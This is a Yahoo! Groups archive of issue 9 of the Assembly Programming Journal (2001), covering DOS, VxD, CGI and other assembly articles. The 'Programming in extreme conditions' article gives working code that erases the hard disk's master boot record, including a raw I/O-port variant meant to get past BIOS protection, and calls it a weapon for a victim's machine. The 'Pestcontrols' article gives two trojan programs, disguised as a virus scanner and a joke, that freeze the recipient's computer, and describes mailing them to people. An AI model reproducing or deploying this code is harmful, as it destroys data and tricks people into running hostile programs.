Search the web
Sign In
New User? Sign Up
apj-announce · Announcement group
? Already a member? Sign in to Yahoo!

Yahoo! Groups Tips

Did you know...
Want to share photos of your group with the world? Add a group photo to Flickr.

Best of Y! Groups

   Check them out and nominate your group.
Having problems with message search? Fill out this form to ensure your group is one of the first to be migrated to the new message search system.

Messages

  Messages Help
Advanced
Messages 1 - 18 of 18   Newest  |  < Newer  |  Older >  |  Oldest
Messages: Show Message Summaries   (Group by Topic) Sort by Date v  
#18 From: "Michael Mondragon" <mammon_@...>
Date: Fri Aug 31, 2001 8:08 am
Subject: APJ Issue #9 Aug 01-Sept01
mammon_@...
Send Email Send Email
 
APJ issue coming from beyond the grave! Thanks to Tiago for taking this
over.

_m

_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp
::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.                                              Sep 00-Aug
01
:::\_____\::::::::::.                                             Issue
   9
::::::::::::::::::::::.........................................................

             A S S E M B L Y   P R O G R A M M I N G   J O U R N A L
                       http://asmjournal.freeservers.com
                            asmjournal@...




T A B L E   O F   C O N T E N T S
----------------------------------------------------------------------
Introduction.............................................Tiago.Sanches

"Programming in extreme conditions".......................Kalmykov.b52

"Pestcontrols"...........................................Jan.Verhoeven

Column: Win32 Assembly Programming
     "How to write VxDs using NASM".............................therain
     "Common Gateway Interface using PE console apps"....Michael.Pruitt

Column: The Unix World
     "Writing A Useful Program With NASM".................Jonathan.Leto
     "Command Line in FreeBSD".........................G.Adam.Stanislav
     "Compressing data"...................................Feryno.Gabris

Column: PalmOS Environment
     "Hello Tiny World"..........................................Latigo

Column: Gaming Corner
     "Win32 ASM Game Programming - Part 2"..................Chris.Hobbs

Column: Assembly Language Snippets
     "Basic trigonometry functions"....................Eoin.O'Callaghan
     "getpass"................................................Jake.Bush
     "strcmp".................................................Jake.Bush
     "strlwr".................................................Jake.Bush
     "strupr".................................................Jake.Bush

Column: Issue Solution
     "Exact Pattern Matching Algorithms"...............Steve.Hutchesson
     "Binary String Search Algorithm".........................buliaNaza

----------------------------------------------------------------------
        +++++++++++++++++++Issue Challenge++++++++++++++++++
               Code a fast pattern matching algorithm
----------------------------------------------------------------------



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::..............................................INTRODUCTION
                                                                by Tiago
Sanches


Finally, issue 9 is out!

After a long, long time APJ is back. What happened?

Well, mainly due to mammon_'s lack of free time to handle everything
concerning
the journal by himself and whatnot (which may have led to a shortage of
contributions), APJ had to be discontinued as of last year. The good news
are
that the journal is back, many people have volunteered to help out and so in
the future a staff may actually be a reality, allowing things to run
smoother
than they have. On a side note, mammon_ is still administrating the journal,
even if time constraints don't allow him to get as involved in its
management
as before.

Anyway, about this issue, there are articles ranging from CGI programming,
written by Michael Pruitt, to the continuation of Chris Hobbs' gaming series
(that Chili prepared for ASCII distribution). A new column has also been
created, concerning the emerging PalmOS platform, featuring a very good
introductory article by Latigo.

G. Adam Stanislav contributed another article for the Unix side, along with
Feryno Gabris, who presents an ELF compressor, whose text may look somewhat
cryptic at first if not for the source code provided, both NASM oriented.
Also
for NASM, therain shows how to write VxDs and Jonathan Leto provided an
article
for the beginning assembly programmer.

To close the list is a "back to the stone age" low-level programming article
by
Kalmykov.b52 for when everything you have is MS-DOS and, lastly, it's Jan
Verhoeven's payback day as he says: "This time the joke is on you!".

All in all this issue is packed with very good articles, not mentioning the
great trigonometry macros by Eoin O'Callaghan in the snippets section, as
well
as some other pieces of code from Jake Bush and at the end the issue
challenge
that this time focuses on pattern matching algorithms, featuring a great
work
done by Steve Hutchesson along with code presented by buliaNaza.

Just a reminder for contributers on submission guidelines: articles must be
written in English and may focus on any aspect of assembly language for any
level of programming, but remember that they must be in ASCII text format.
Here
are some rules to follow:

     - lines should have a maximum of 80 characters (including the 'New Line'
       character), with no left or right margins.
     - article subsections should consist of a subsection name, a following
line
       of hyphens to underscore and be preceded by two carriage returns.
     - Paragraphs should not be indented and must be seperated by a blank
line.
     - Code indentation (opcodes) should be about 8 chars.
     - Don't use TABs, use spaces instead!

That said, remember to supply a name or handle and a title for the article
and
check the contents of the current issue for a general idea of the magazine's
format. You can mail the articles, snippets or any other contribution to me
at:

     sanches@...

Hopefully, with your help, issue 10 will be out faster than this one and the
journal can start being released on a regular basis again.

As mammon_ would say, enjoy the mag!


Tiago Sanches



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                               Programming in extreme
conditions
                                               by Kalmykov.b52


INTRODUCTION
------------
What is 'extreme conditions' ? When you are sitting in front of a computer
with
only MS-DOS installed without any compilers, hex editors, shells, debuggers
and
you need to recover lost data, delete virus, or write a new one. This is an
extreme conditions. Most of programmers won't be able to do anything, most
of
administrators think that this computer is 100% secured. But this won't stop
the assembler programmer ...

I have chosen pure MS-DOS as the operation system to program for because in
Windows there are many things that will easier this task (e.g. in Windows 98
there is-built in browser with VBScript and Java Script interpretators so
you
can easy write a hex-editor and more).

This article will be interesting as for the beginners and experienced
programmers. Also I recommend it to hackers, administrators, and anybody who
wants to feel the spirit of low-level programming, which now is disappearing
with the previous programmers generation generation.


THE BEGINNING
-------------
To read and understand this you will need this minimum: the knowledge of
Assembler, experience working with MS-DOS. Also you will need the list of
x86
instructions opcodes, ASCII table, and lot of free time. First of all, we
need
some kind of text editor. But the administrator removed EVERYTHING that
could
help us. There is only one thing that differs a good programmer from any
other-
It's the deep knowledge of everything he works with. If works with DOS he
knows
everything about it. There is undocumented functions that opens a tiny text
editor, but that's enough. Enter this DOS command:

C:\copy con test.com

You will run the text editor. This is our instrument. But we still don't
know
how to write binaries. If you will look to official MS-DOS manual, you'll
find
the answer. Using ALT key and the numeric keyboard you can create binaries.
First of all check if the NUMlock is on. Now press ALT, type 195, now
release
ALT. To save file and exit press CTRL-Z and hit enter. Now run it. It
doesn't
do anything but it doesn't halt the system. If you disassemble it you will
find
that test.com consists of only one operand RETN. As you already guessed
opcode
of RETN (195 == 0xC3), and in decimal it is 195.


ADVANCED
--------
Well, It was easy. Now try to enter this:

ALT-180 ALT-09 ALT-186 ALT-09 ALT-01 ALT-205 ! ALT-195 ALT 32 Hi,world!$

Than press CTRL-Z and hit enter. It is clear that this program that prints
"Hi,world!". Let's disassemble it:

49E0:0100                       start:
49E0:0100  B4 09                               mov     ah,9
49E0:0102  BA 0109                             mov     dx,offset data_1
49E0:0105  CD 21                               int     21h ; DOS Services
                                                            ; ah=function 09h
                                                            ; display char
                                                            ; string at ds:dx
49E0:0107  C3                                   retn
49E0:0108  20                                   db      20h
49E0:0109  48 69 20 21 21 21    data_1          db      'Hi,world!$
                                                         ; xref 49E0:0102

I hope you know about the reversed order in machine word (ALT-09 ALT-01 =
109).
Also, in order to show the beauty of this method, I used symbol '!' == 0x21
to
call interrupt 0x21. So knowing ASCII codes can easier your life. But why we
need this symbol (20h == ALT-32 == " ") at 49E0:0108 ?
This is the main problem of this method. Using ALT and numeric keyboard we
cannot enter some symbols. Here is a list of them:

         0,3,6,8,16(0x10),19(0x13),27(0x1b),255(0xFF)

You will need to avoid this symbols. If you look at the code, you'll see
that
the real offset is 0x108. After adding a symbol the offset became 0x109.
Actually there is more elegant way to do it:

         mov     dx,109
         dec     sx

These two variants are equal (dec dx == 1 byte) and you chose what suits you
best. Another problem is finding offset of variables and labels. You can
write
program on the paper, giving to variables symbolic names, and then the
program will be ready it will be easy to find necessary offsets and address.
Another possibility is declaring all variables before their usage:

         mov     ah,9
         jmp     sort $+20
         db      'Hi,world!'$
         mov     dx,0x100+2+2; 0x100 - the base adress,2 - lengh of
                              ; mov  ah,9, 2 - lengh of jmp

jmp short $+20 - reserves 20 bytes for the string. This method could be also
used for labels.


THE EXAMPLE
-----------
I think you are tired of these theoretical programming and feel ready to see
this method in work. As illustration we will to create a program that erases
the boot sector. Attention ! The usage of this program in order to destroy
information is a crime. You should use it only for experimental purpose.

First of all, let's write it on assembler:

B80103   mov     ax,00301
B90100   mov     cx,00001
BA8000   mov     dx,00080
CD13     int     013
C3       retn

As you see we have one #0 and two #3. Let's modify the program to avoid
them:

         xor     ax,ax
         mov     ds,ax
         mov     ax,00299
         inc     ax
         inc     ax
         xor     cx,cx
         inc     cx
         mov     dl,80
         mov     bx,13h*4
         pushf
         cli
         push    cs
         call    dword ptr [bx]
         retn

Maybe it's quite a hard example. The assembler programming and interrupts
are not really the subject of this article. I can only forward you to the
other
references that you can easily find on the Internet. Fortunately
(or unfortunately, depends on readers orientation), in BIOS there is a boot
write protection (sometimes it's called "Virus warning").It will block any
efforts to modify the main boot sector.

For example, running this program under Windows 98 operation system will
take
no effect. But we still can work with hard drive I/O ports on a low-level.
Here is an example of program that will erase main boot sector, through hard
drive I/O ports:

         mov     dx, 1F2h
         mov     al,1
         out     dx,al
         inc     dx
         out     dx,al
         inc     dx
         xor     ax,ax
         out     dx,al
         inc     dx
         out     dx,al
         mov     al, 10100000b
         inc     dx
         out     dx,al
         inc     dx
         mov     al,30h
         out     dx,al
         lea     si, Buffer
         mov     dx, 1F0h
         mov     cx, 513
         rep     outsw

I don't know any popular protection that can track and block that program.
However, that doesn't refer to Windows NT, this OS won't allow any program
without necessary privileges to work with ports, even more it will close
the application's window. Preparing this example for entering it using ALT
and optimizing It's size I will leave as an exercise to the readers.That's
all:
enter this in victims machine and you have powerful weapon. I recommend to
use
it very carefully.


ENDING
------
It's not easy. All this requires a lot of experience and talent but gives
you
incredible power on machine(and i hope you won't be using this power for
destruction). All this looks quite unuseful, you can say that you won't need
it - but who knows?.. Nowdays programmer depends on the powerfull
development
tools (compilers, debuggers, editors) and when he stay alone with 'nature'
he cannot control the situation anymore - he cannot control the machine ...



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                                Pestcontrols
                                                                by Jan
Verhoeven


Are you plagued now and then by friends and relatives who send you funny
pictures (mostly with a lot of "beneath the belt content") via E-mail?

I used to have them. I got rid of these pests.

How I did it? I sent back some nice programs. And if they run Outlook
Express,
they can't resist to open the attachment.

What I do is NOT make a virus. It is at best a trojan horse, but in fact it
doesn't even come close to a trojan. No harm is done (intentionaly) unless
the
victim is a real moron and starts an unknown executable.


Pestcontrol 1: the virus scanner
--------------------------------
Most of the afore mentioned morons know of the exsitence of virus scanners.
So
they will be more than eager to try out the latest one, especially if it is
as
compact as this one:

name scan

lf equ 10
cr equ 13

mov dx, offset text
mov ah, 9
int 021 ; show some message

back: cli ; disable keyboard etc
jmp back ; and do it again

mov ax, 04C00 ; by the time pigs can fly, ...
int 021 ; ... the program is halted.

text db 'Scanning your system....', cr, lf
db 'Please wait a minute. $'
db 1023 dup (073)

Yes, you are right, this COM file is something like 1 Kb in size. You can
easily control the size by adjusting the value in the last line. Make sure
to
remain well under the 64K limit else the file cannot be a COM file anymore
and
there is a chance that a wraparound will occur in which you main routine
will
be overwritten.

I hesitate to explain the program. It's so damned simple. In part 1 the
message
is printed to the screen. In part 2 the computer is crippled and in part 3
the
program returns to the command interpreter, only this point is never
reached.... :o)

Believe me: people will wait HOURS before they get worried and try to
Alt-Ctrl-Del themselves a way out of this problem. Only to find out that
their
efforts are in vain.
If this program is run from within a DOS box under WIndows, and the user had
a
lot of other tasks open, he will loose any unsaved work. And if he or she is
on
a network, it may be crippled as well.

So be a little bit careful who you treat to this attachment.....


Pestcontrol 2: something funny
------------------------------
We all like jokes, don't we? So we send eachother large breasted foto's and
such. I have a joke to send back to these persons. It's a real funny
program,
believe me. And efficient.

name funny

cli ; disable keyboard and interrupts
cld ; make sure we move upwards
mov ax, 0A000 ; point to start of VGA pixel RAM
mov es, ax
mov ds, ax
L1: cli ; INT's off again, just in case...
mov cx, 08000
mov ax, 0
mov di, ax
mov si, ax
L0: cli ; did I turn of INT's?
lodsw ; fetch word from VGA screen
xor ax, ax ; clear it
stosw ; and store it
loop L0 ; loop back to CLI instruction
cli ; and turn off interrupts
jmp L1 ; before jumping back to the CLI.

db 22K dup ('Í ') ; add some more muscles.

This is a real nasty program. One of the guys at work (two windows away from
my
place; I could see the results...) had been sending me several 500 Kb
funnies.
I asked him to remove me from his mailing but he didn't listen. So I shot
back
(hey, it was self defence!).

The first part of the program kills the keyboard and other interrupts,
whereas
the second part plays a nasty trick on the user screen. I assume the user is
running Windows on a VGA screen.... It keeps on pumping ZERO's into display
memory in a loop that's almost impossible to stop. If the CPU would manage
to
enable interrupts again it will loose control after another few nanoseconds
(on
modern CPU's) or microseconds (on older ones).

The result is devastating: they run the FUNNY.EXE (if there is no MZ in the
exe-header, the program is considered a COM file) and the screen turns black
immediately and they loose all control of the machine. The three fingered
salute will not help. The only option is to pull the plug.

This executable did the trick. Four requests to relieve me from his mail
assaults did not work. One counterattack with my Funny Exe was effective
immediately.


Afterthoughts
-------------
Yes, these programs are nasties. They should NOT be copied or used too soon.
On
the other hand, Windows is so clumsily programmed (there should be IO
Privileges on task switching instructions like IN, OUT and CLI but there
aren't) that it enables malicious software to cause the effects they do.


Reminder
--------
The code published here is GNU GPL. Don't try this at home.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
                                                    How to write VxDs using
NASM
                                                    by therain


I.   About the readers and article's files overview
II.  MASM vs NASM : Syntax overview
III. A skeleton VxD
IV.  More VxD examples
V.   FAQs
VI.  About the writer


I. About the readers and article's files overview
-------------------------------------------------
This article is aimed at the user that already does little Virtual Device
Driver (VxD) progamming using Microsoft's Macro Assembler (MASM). It will
only
cover how to use the Net Wide Assembler (NASM) to write Virtual Device
Drivers
and not how to learn VxD programming using NASM.
It is also suggested that the user be familiar with NASM or read NASM DOC.

As for the files in this article:

NASMVXD.TXT     -   This article.
VXDN.INC        -   Contains VxD related definitions and macros for NASM.
WINDDK.INC      -   This is used by VXDN.INC and should'nt be directly
included
                     by you. It contains VxD related EQU's and it also has
VxD
                     services covering VMM,Shell,Debug,...


II. Overview about MASM & NASM
------------------------------
It is time to mention that NASM was never intended to produce VxD files and
you
won't be able to produce any without the include files from this package and
without Microsoft's Incremental Linker (LINK.EXE).

Okay, now the syntax differences between MASM & NASM.

Processor Mode:
---------------
To enable the use of 386+ protected mode instructions you used to put a
'.386p'
in MASM, no need for that in NASM, however you have to explicitly set the
default bitness to 32 via the 'BITS 32' directive (and to 16 in the real
mode
initialization segment).

     MASM:    .386p
     NASM:    BITS 32

Segments specification:
-----------------------
MASM has lot of segments declaration macros unlike NASM in which you have to
name the segment as you stated it in the .DEF file.

The 5 basic segment definition macros are:

     MASM:                    NASM:            Description
     -----                    -----            -----------
     VxD_CODE_SEG/ENDS        segment _LTEXT   Protected mode code seg.
     VxD_DATA_SEG/ENDS        segment _LDATA   Protected mode data seg.
     VxD_ICODE_SEG/ENDS       segment _ITEXT   Protected mode initialization
                                               code segment. (usually
optional)
     VxD_IDATA_SEG/ENDS       segment _IDATA   Protected mode initialization
                                               data segment. (usually
optional)
     VxD_REAL_INIT_SEG/ENDS   segment _RTEXT   Real mode initialization
                                               segment. (optional too)

Notice that NASM does not need a segment closing macro unlike MASM.

To start a new segment just declare it like 'segment _LTEXT' and everything
after that line will go to that segment.

Please do not use the intrinsic form of the segment macro (e.g.
[segment _LTEXT]) as certain VxD macros rely on saving/restoring the current
segment and they would fail should you use the intrinsic form.

Check the FAQ for a brief segment overview or NASMDOC.TXT for full overview.

Virtual Device Desciptor Block (DDB) Declaration:
-------------------------------------------------

     MASM:
     -----
     Declare_Virtual_Device Name, MajorVer, MinorVer, CtrlProc, DeviceNum,
                            InitOrder, V86Proc, PMProc, RefData

     NASM:
     -----
     Due to the fact that NASM does not support string concatenation in
macros
     yet (there exist patched versions which do), the declaration is a bit
     different:

     Declare_Virtual_Device Name, 'Name', MajorVer, MinorVer, CtrlProc,
                            DeviceNum, InitOrder, V86Proc, PMProc, RefData

     Params 5 to 9 are optional, since most of the time they are generic (not
     used).

     The extra parameter is 'Name' which will become the DDB_Name field in
the
     DDB (this is the name by which the VxD will be known to the VMM), Name
     itself determines the name for the Control Procedure and the Service
Table
     (if used).

     The DDB must be declared inside the _LDATA segment.

     Example:

     segment _LDATA
     Declare_Virtual_Device SAMPVXD1, 'SAMPVXD1', 1, 0, SAMPVXD1_Control

Control Procedure Definition:
-----------------------------

     MASM:
     -----
     Begin_Control_Dispatch NAME
         Control_Dispatch Message,Proc
     End_Control_Dispatch

     NASM:
     -----
     This will be a little new for you since you have to do it by hand and
not
     by similar macros:

     segment _LTEXT

     VXDNAME_Control:
         cmp  eax,VM_INIT
         je   OnVmInit

         cmp  eax,W32_DEVICEIOCONTROL
         je   OnDIOC

         cmp  eax,<system message>
         je   <Desired Event handler proc>

         clc  ; At any time during initialization, a virtual device can set
the
              ; carry flag and return to the VMM to prevent the virtual
device
              ; from loading. This means that the carry flag must be cleared
to
              ; allow loading.

         retn

     OnVmInit:
         ; Do some code
         ret

     OnDIOC: ; OnDeviceIoControl
         ; ESI points to a DIOCParams struct
         cmp   word [esi+DIOCParams.dwIoControlCode],MY_DIOC_CODE
         je    domycode

         retn   ; Don't forget to put a return as you're used to put a
                ; "EndProc procname"

Any Other procedure Definition
------------------------------
Using NASM's normal procedure definition you can define a new proc as
usual: "procname :".
As for calling conventions you have to access the stack yourself or use some
other NASM macros.

Using VxdCall and VMMCall
-------------------------
In NASM you can call: VMMCall Service,param1,{param2},[ [{]param3[}] ],....


III. A skeleton VxD
--------------------
A skeleton VxD will be a very basic VxD enough to be loaded correctly and do
nothing more than taking up memory. =)

In NVXDSKEL.DEF you can specify if it will be a DYNAMIC or a STATIC VxD
like:

VXD MYVXD DYNAMIC  ; dynamic vxd
VXD MYVXD          ; static vxd

NVXDSKEL.DEF
------------

VXD NVXDSKEL DYNAMIC

SEGMENTS
   _LTEXT      CLASS 'LCODE'   PRELOAD NONDISCARDABLE
   _LDATA      CLASS 'LCODE'   PRELOAD NONDISCARDABLE
   _TEXT       CLASS 'LCODE'   PRELOAD NONDISCARDABLE
   _DATA       CLASS 'LCODE'   PRELOAD NONDISCARDABLE
   CONST       CLASS 'LCODE'   PRELOAD NONDISCARDABLE
   _ITEXT      CLASS 'ICODE'   DISCARDABLE
   _IDATA      CLASS 'ICODE'   DISCARDABLE
   _PTEXT      CLASS 'PCODE'   NONDISCARDABLE
   _PDATA      CLASS 'PDATA'   NONDISCARDABLE SHARED
   _STEXT      CLASS 'SCODE'   RESIDENT
   _SDATA      CLASS 'SCODE'   RESIDENT
   _DBOSTART   CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
   _DBOCODE    CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
   _DBODATA    CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
   _RCODE      CLASS 'RCODE'

EXPORTS
   NVXDSKEL_DDB @1

NVXDSKEL.ASM
------------

bits 32

%include "vxdn.inc"

segment _LDATA

Declare_Virtual_Device NVXDSKEL,'NVXDSKEL',1,0,NVXDSKEL_Control

segment _LTEXT

NVXDSKEL_Control:
         clc
         retn

Assembling and linking:
-----------------------
* To assemble you must have NASM v0.98+
NASM NVXDSKEL.ASM -f win32
LINK NVXDSKEL.OBJ /VXD /DEF:NVXDSKEL.DEF

That's it!


IV. More VxD examples
---------------------
This example will show the use of VMMCall and VxDCall

VXDSAMP1.DEF
------------

VXD VXDSAMP1 DYNAMIC

SEGMENTS
   _LTEXT      CLASS 'LCODE'   PRELOAD NONDISCARDABLE
   _LDATA      CLASS 'LCODE'   PRELOAD NONDISCARDABLE
   _TEXT       CLASS 'LCODE'   PRELOAD NONDISCARDABLE
   _DATA       CLASS 'LCODE'   PRELOAD NONDISCARDABLE
   CONST       CLASS 'LCODE'   PRELOAD NONDISCARDABLE
   _ITEXT      CLASS 'ICODE'   DISCARDABLE
   _IDATA      CLASS 'ICODE'   DISCARDABLE
   _PTEXT      CLASS 'PCODE'   NONDISCARDABLE
   _PDATA      CLASS 'PDATA'   NONDISCARDABLE SHARED
   _STEXT      CLASS 'SCODE'   RESIDENT
   _SDATA      CLASS 'SCODE'   RESIDENT
   _DBOSTART   CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
   _DBOCODE    CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
   _DBODATA    CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
   _RCODE      CLASS 'RCODE'

EXPORTS
   VXDSAMP1_DDB @1

VXDSAMP1.ASM
------------

bits 32

%include "vxdn.inc"

segment _LDATA

Declare_Virtual_Device VXDSAMP1,'VXDSAMP1',1,0,VXDSAMP1_Control

segment _LTEXT

VXDSAMP1_Control:
         cmp  eax,W32_DEVICEIOCONTROL
         je   OnDIOC

         clc
         retn

OnDIOC:
         cmp  dword [esi+DIOCParams.dwIoControlCode],1
         je   .1

         xor  eax,eax
         jmp  .ret
         .1:

         VMMCall Get_Sys_VM_Handle

         xor   esi,esi ; no callback
         xor   edx,edx ; no ref data for callback
         mov   eax,0
         mov   ecx,Msg
         mov   edi,Title
         VxDCall SHELL_Message

        .ret:
         retn

segment _LDATA
Msg   db 'Hello world!',0
Title db 'Title!',0

<EOF>

And another example that calls Int21/Ah=02,dl=7 to beep.

VXDSAMP2.ASM
------------

bits 32

%include "vxdn.inc"

segment _LDATA

Declare_Virtual_Device VXDSAMP2,'VXDSAMP2',1,0,VXDSAMP2_Control

segment _LTEXT

VXDSAMP2_Control:

         cmp  eax,W32_DEVICEIOCONTROL
         je   OnDIOC

         clc
         retn

OnDIOC:
         cmp  dword [esi+DIOCParams.dwIoControlCode],1
         je   .1

         xor  eax,eax
         jmp  .ret

         .1:
         VxDCall Begin_Nest_V86_Exec

         mov word [ebp+CRS.EAX],0x0200
         mov word [ebp+CRS.EDX],0x0007
         mov eax,0x21

         VxDCall Exec_Int

         VxDCall End_Nest_Exec

        .ret:
         retn
<EOF>

Use .DEF like previous example but change name to the new VxD name.

To test the last two examples, just open the VxD with CreateFileA() and then
issue a DeviceIoControl() with code 1.


V. FAQs
-------
Q) Where can i get NASM and LINK from?
A) As for NASM you can get it from:
      http://www.web-sites.co.uk/nasm/
    As for LINK.EXE you can get it from the DDK or just download the MASM
Pack
    from http://win32asm.cjb.net

Q) How can i add new services and use them with NASM?
A) You can start by defining:

    MyDevice_DeviceID equ 0x1234 ; must be word

    and then define a service table like:

    Begin_Service_Table MyDevice
       VMM_Service MyService0                 ; 0x0000 ord
       VMM_Service MyService1                 ; 0x0001 ord
       VMM_Service MyServiceN                 ; ord N
    End_Service_Table MyDevice


VI. About the writers
---------------------
Me as therain, would like to credit:

fOSSiL
   &
The Owl  - For creating VXDN.INC and
            for showing how to write VxDs in NASM in the first place
            by demonstrating it in IceDump (visit: http://icedump.tsx.org).
            And for reviewing/editing this document.

Iczelion - For his awesome win32asm resource site and for his
            good VxD tutorials. (visit: http://win32asm.cjb.net)

UKC Team - For their support.


[The VXDN.INC and WINDDK.INC files can be obtained from

http://asmjournal.freeservers.com/files/nasmvxd.zip

where they have been archived along with the text of the article.]



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
                                  Common Gateway Interface using PE console
apps
                                  by Michael Pruitt


CGI: Tutorial 01: Supplying Dynamic Data to a Web Client
--------------------------------------------------------
In the early '90s the NCSA released HTTPd 1.0 (a web server), a new concept
was
included; CGI.  This feature allowed web content to be dynamically generated
on
the server.  Up-to-date reports of stocks, scores, and weather were possible
with CGI.  Other uses include message boards, guest books, or e-stores.

Typically a CGI application will interface with a Mosaic type web browser;
supplying HTML with the data.  When the server recieves a request targeting
a
CGI program, it will lauch the application.  Any data from the client will
be
piped to StdIn.  The app's StdOut will then be sent back to the client.


Tools Needed
------------
This tutorial is written for FAsm (http://omega.im.uj.edu.pl/~grysztar/). If
you wish to assemble the program, you will need FAsm 1.13.4 (or later) or
you
can translate it to an assembler supporting 80x86 PE console.

For any CGI testing access to a web server is a must. I recommend Apache
1.3.20
(http://httpd.apache.org/). For starting out, you can place your assembled
executable into the \Apache\cgi-bin\ directory. For the server name use
"localhost" (excluding the quotes).

Knowledge of HTML (HyperText Markup Language) is usefull. The basics of HTML
are easy to learn. CSS (Cascading Style Sheets) will prove invaluable if you
use a lot of HTML. A list of books is provided at the end of this article.

A Win32 platform. My system consist of Win 98 SE on a Celeron 433 w/ 128MB
RAM.
Win 95 - NT should work without issues. A Linux box running WINE shoud also
work for those with a strong stomach.


Win32 API
---------
Since everything a CGI application does is non GUI, the kernal32.dll will
suffice for most projects.  Database intensive app's will link to other
dll's
to better implement designs.

To access the Standard I/O, will need to use GetStdHandle.  Under Win32,
StdIO
is not availiable under predefined handles.  ReadFile and WriteFile is used
to
move data.  ReadConsole and WriteConsole will not work; file redirection in
not
availiable.


CGI Environment
---------------
A CGI program is not required to read data, but it is required to send it.
Client data is availiable on the StdIn. The length is in the CONTENT_LENGTH
environment variable.  Also, 255 bytes of the data is in the QUERY_STRING
EnvVar.  All out put must start with "Content-Type:" a space, the type, and
two
newlines (CrLf).  Common types include: "text/plain", "text/html", or
"image/gif". Example output:

         Content-Type: text/plain

         Hello World. Example of HTTP 1.1 header and body.

If you don't write any data, the web server will report with the error:
"Premature end of script headers".  If you really don't want to supply data,
you could just write: "Content-Type: text/plain" and two newlines.


The Example Program
-------------------
The program I've supplied writes HTML containing the current date and time.
It
demonstrates use of API's, HTML, data manipulation.


~~~~~~~~~~~~~~~~~~~|||-------------------[code]-------------------|||
format PE console
entry Start

include '\Asm_Win32\Include\_Kernel.inc'
include '\Asm_Win32\Include\macro\stdcall.inc'
include '\Asm_Win32\Include\macro\import.inc'

    Cr    = 0x0D
    Lf    = 0x0A
;***---------------------------------------------------------------***
section '.code' code readable executable
Start:
     pusha                                        ;Save all of the Registers
     stdcall [GetStdHandle], STD_OUTPUT_HANDLE    ;Retrive the actual handle
     mov     [StdOut], eax
     cmp     eax, INVALID_HANDLE_VALUE            ;Error with handle
     jz      Exit

Get_Time:
     stdcall [GetSystemTime], Time                ;Load SYSTEMTIME with UTC
     call    Format_Time                          ;Convert Hex(bin) to ascii
                                                  ; and Place into HTML
Write:
     stdcall [WriteFile], [StdOut], HTML, HTML._size, HTML.Len, 0
                                                  ;Write the HTML to StdOut
Exit:
     popa                                         ;Restore all of the
Registers
     stdcall [ExitProcess], 0

;***-------------------------[Subroutine]--------------------------***
Format_Time:
     mov     ax, [Time.wYear]                     ;16b Data
     mov     edi, HTML.Date_S + 9                 ;Ptr to LAST byte of dest
     call    .ascii                               ;Convert and place into
HTML

     mov     ax, [Time.wDay]
     mov     edi, HTML.Date_S + 4
     call    .ascii

     mov     ax, [Time.wMonth]
     mov     edi, HTML.Date_S + 1
     call    .ascii

     mov     edi, HTML.Day_S                      ;Destination Ptr
     mov     esi, Day.Wk                          ;Source Ptr (Array of Days)
     xor     eax, eax
     mov     ax, [Time.wDayOfWeek]                ;0 <= eax < 7
     add     esi, eax                             ;esi =+ eax * 3
     add     esi, eax                             ; Indexes the Array
     add     esi, eax
     mov     ecx, 3                               ;3B per Day String
     cld                                          ;Copy Left to Right
     rep                                          ;    (esi++, edi++)
     movsb

     mov     ax, [Time.wHour]
     cmp     al, 13                               ;Check for PM
     jl      .wHour
     sub     al, 12                               ;Correct Hour
     mov     [HTML.Time_S + 9], 'P'               ; AM -> PM

.wHour:
     mov     edi, HTML.Time_S + 1
     call    .ascii

     mov     ax, [Time.wMinute]
     mov     edi, HTML.Time_S + 4
     call    .ascii

     mov     ax, [Time.wSecond]
     mov     edi, HTML.Time_S + 7
     call    .ascii
     ret

;***----------------------[Import Table / IAT]---------------------***
.ascii:
     std                                          ;String OPs Right to Left
     cmp     ax, 10                               ;Single Digit?
     jl      .onex10

     and     ah, ah                               ;Only Two Digits
     jz      .twox16

     mov     bh, 10                               ;Reduce 3x16 to 2x16
     div     bh                                   ;  so that AAM can be used
     or      ah, 0x30                             ;BCD -> ASCII
     mov     [edi], ah
     dec     edi
.twox16:
     aam                                          ; AH / 10 = AH r AL
     or      al, 0x30                             ;BCD -> ASCII
     stosb
     mov     al, ah
     cmp     ah, 9
     jg      .twox16
.onex10:
     or      al, 0x30
     stosb                                        ;Copy Last/Only Digit to
Mem
     ret

;***--------------------[Data used by this App]--------------------***
section '.data' data readable writeable
   StdIn         dd 0                             ;Standard I/O Handles
   StdOut        dd 0

HTML:
db 'Content-type: text/html', Cr, Lf, Cr, Lf
db '<html><head><title>Hello World</title></head>', Cr, Lf
db '<body bgcolor=Black text=Cyan><h1>Hello World</h1>', Cr, Lf
db '<h2><font color=Lime>', Cr, Lf
db 'This HTML is dynamicly generated by a PE console Application writen in'
db '80x86 Assembler</font></h2>', Cr, Lf
db '<h2><font color=Red>It is: </font><font color=Blue>'
    .Day_S       db 'WkD '
    .Date_S      db ' 0/00/0000</font> <font color=Magenta>'
   .Time_S      db ' 0:00:00 AM</font> <font color=Lime>UTC</font></h2>', Cr,
Lf
                 db '</body></html>', Cr, Lf
HTML._size     = $ - HTML - 1
HTML.Len        dd 0                            ;Number of bytes actually
wrote

   Time          SYSTEMTIME
   Day.Wk        db 'SunMonTueWedThuFriSat'

;***----------------------[Import Table / IAT]---------------------***
section '.idata' import data readable writeable

library     kernel,             'KERNEL32.DLL'

kernel:
   import    GetModuleHandle,    'GetModuleHandleA',\
